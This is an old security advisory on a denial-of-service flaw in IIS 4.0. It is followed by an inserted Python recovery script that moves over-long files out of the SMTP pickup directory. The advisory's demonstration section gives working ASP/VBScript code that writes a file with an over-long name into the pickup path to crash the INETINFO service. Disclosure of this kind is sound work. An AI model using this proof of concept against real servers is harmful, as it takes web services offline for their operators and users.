IIS 4 Denial of Service


Reported February 20, 2000 by valentijn
VERSIONS AFFECTED
Internet Information Server 4.0 on NT 4.0 with SMTP Service installed

DESCRIPTION

It is possible to cause a denial of service condition against IIS by manipulating file names within the SMTP service's directory structure. By creating a file name of more than 85 characters in length within the "\mailroot\pickup" directory, the mail server will generate an error and crash the INETINFO service, which supports IIS.

In addition, as long as the file remains in place IIS cannot start up properly. To restore service the file must be removed.
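The recovery step above can be scripted. The following is an added example, not part of the original advisory: it lists files in the pickup directory whose names exceed 85 characters and moves them to a quarantine folder so the service can be restarted. It assumes the 85-character limit counts the whole file name including the extension; the function names, quarantine layout and sample files are hypothetical.

```python
import itertools
import shutil
import tempfile
from pathlib import Path

MAX_NAME_LEN = 85  # limit from the advisory; assumed to include the extension


def find_overlong(pickup_dir, limit=MAX_NAME_LEN):
    """Return files directly inside pickup_dir whose name exceeds `limit` characters."""
    return sorted(p for p in Path(pickup_dir).iterdir()
                  if p.is_file() and len(p.name) > limit)


def quarantine_overlong(pickup_dir, quarantine_dir, limit=MAX_NAME_LEN, dry_run=False):
    """Move over-long files out of the pickup directory.

    Returns (original_name, destination) pairs. With dry_run=True nothing is
    moved and the pairs describe what would happen.
    """
    qdir = Path(quarantine_dir)
    used, moved = set(), []
    for src in find_overlong(pickup_dir, limit):
        # Short destination names keep the quarantined copy under the limit;
        # skip slots already taken by an earlier run.
        slots = (qdir / f"quarantined-{i:04d}.eml" for i in itertools.count())
        dst = next(c for c in slots if c not in used and not c.exists())
        used.add(dst)
        if not dry_run:
            qdir.mkdir(parents=True, exist_ok=True)
            shutil.move(str(src), str(dst))
            # Record the original name beside the file for later review.
            dst.with_suffix(".name.txt").write_text(src.name + "\n")
        moved.append((src.name, dst))
    return moved


if __name__ == "__main__":
    # Constructed sample: a throwaway directory standing in for \mailroot\pickup.
    with tempfile.TemporaryDirectory() as tmp:
        pickup = Path(tmp) / "pickup"
        pickup.mkdir()
        (pickup / "normal.eml").write_text("ok\n")
        (pickup / ("A" * 90 + ".eml")).write_text("suspect\n")
        for name, dst in quarantine_overlong(pickup, Path(tmp) / "quarantine"):
            print(f"moved {len(name)}-character name to {dst.name}")
```

Run it with `dry_run=True` first to see which files would be moved before changing anything on the server.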

DEMONSTRATION

This demonstration code runs on the server side, which means you need a way to get the code onto the server to begin with. This may imply a rather low risk, since it's hard to get foreign code onto a remote server, but consider a scenario that involves an ISP that routinely allows ASP code to be installed on private sites.

<script>
' PLEASE PROVIDE YOUR PICKUP PATH HERE
Rootpath = "c:\inetpub\mailroot\pickup\"

Set fso = createobject("scripting.filesystemobject")
Thename = Createkey & fso.GetTempName & ".eml"
Set Thefile = fso.GetFolder(rootpath).CreateTextFile(TheName)
  Thefile.writeline "X-Sender: [email protected]"
  Thefile.writeline "X-Receiver: [email protected]"
  Thefile.writeline "From: <[email protected]>"
  Thefile.writeline "To: <[email protected]>"
  Thefile.writeline "Subject: MINE DID NOT CRASH"
  Thefile.writeline "Date: " & now()
  Thefile.writeline "X-Generator: " & Thename
  Thefile.close
Set thefile = nothing
  Thename = ""

Function Createkey
for z = 1 to 80
   randomize
   a = Int((25 * Rnd) + 1)
   password = password & chr(a+65)
next
Createkey = password
end function

</script>

VENDOR RESPONSE

Microsoft is aware of this issue; however, no comment was available at the time of this writing.

CREDITS
Discovered by valentijn
